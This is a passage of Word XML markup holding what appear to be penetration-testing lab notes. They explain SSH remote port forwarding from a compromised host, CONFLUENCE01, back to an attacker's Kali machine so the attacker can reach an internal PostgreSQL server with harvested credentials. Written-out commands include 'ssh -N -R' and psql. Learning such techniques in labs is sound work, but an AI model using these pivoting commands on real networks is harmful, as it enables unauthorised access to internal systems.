          <w:numId w:val="1134"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get around this, we can do a SSH Remote Port Forward, where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, how this works is that for our Kali, we send commands to our loopback address (localhost) on a specific port, which gets pushed by the Kali SSH server software through the SSH tunnel back to the SSH client on CONFLUENCE01. They are then forwarded to the PostgreSQL database port on PGDATABASE01.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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First, we'll need to enable the SSH server on our Kali machine. OpenSSH server is preinstalled - all we need to do is start it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Warning: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you start the Kali SSH server, make sure you've set a strong, unique password for the Kali user!</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl start ssh</w:t>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We can check that the SSH port is open as we expected using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="202" name="image196.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image196.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ss -ntplu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SSH server is listening on port 22 on all interfaces for both </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: To connect back to the Kali SSH server using a username and password you may have to explicitly allow password-based authentication by setting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordAuthentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">yes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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We run this on CONFLUENCE01 (the middleman)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command connects CONFLUENCE01 to our Kali machine (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.118.4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and puts a listener on our Kali on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And then whenever someone sends packets there, CONFLUENCE01 will forward that to PGDATABASE01 (our target machine) on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SSH remote port forward option is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and has a very similar syntax to the local port forward option. It also takes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> two socket pairs as the argument</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket is defined first, and the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">forwarding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket is second.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We want to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on our Kali machine (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="781"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We want to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">forward </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">all traffic to the PostgreSQL port on PGDATABASE01 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.215:5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</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t xml:space="preserve">The SSH connection back to our Kali machine was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="513" name="image500.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image500.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId193"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="801"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this in our kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="801"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can confirm that our remote port forward port is listening by checking if port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is open on our Kali loopback interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="801"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu</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With the port forward active, we can now query port 2345 on the Kali loopback interface as though interacting directly with the PostgreSQL service on PGDATABASE01. On our Kali machine, we will use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, passing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the host (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the port (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), and using the database credentials of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) we found earlier on CONFLUENCE01.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -h 127.0.0.1 -p 2345 -U postgres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify our own kali by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This then gets sent back to CONFLUENCE who forwards it to PGDATABASE01 on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</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6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xvrn4ne0f7y7" w:id="80"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Remote Dynamic Port Forwarding</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TLDR:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Similar to the set up of SSH Remote Port Forwarding. We just run SSH from the middleman (CONFLUENCE01) to our Kali, which means the middleman is the SSH Client and Kali is SSH Server. And this actually sets up a SOCKS Proxy on our Kali on a specific port, which we can then connect to ourselves using Proxychains. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
